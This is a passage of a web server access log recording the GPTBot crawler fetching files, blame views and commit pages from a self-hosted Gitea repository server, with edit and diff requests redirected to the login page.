"https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 2209] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 893] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 9631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 935] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 19528] [Gzip 8.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11312] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10909] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:42:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:42:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10940] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16531] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14263] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:42:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:42:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:42:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:42:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9907] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:16:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 14194] [Gzip 8.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:16:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1403] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:16:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:16:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 14224] [Gzip 8.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:16:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1403] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:16:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14875] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostissues&state=all" [Client 74.7.227.38] [Length 8501] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=open" +[17/Feb/2026:16:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:16:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:16:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll?display=rendered" [Client 74.7.227.38] [Length 10843] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:16:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=name&state=closed" [Client 74.7.227.38] [Length 8504] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" +[17/Feb/2026:16:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11041] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" +[17/Feb/2026:16:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:16:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14869] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16523] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14254] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13977] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" +[17/Feb/2026:16:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14225] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21635] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21681] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 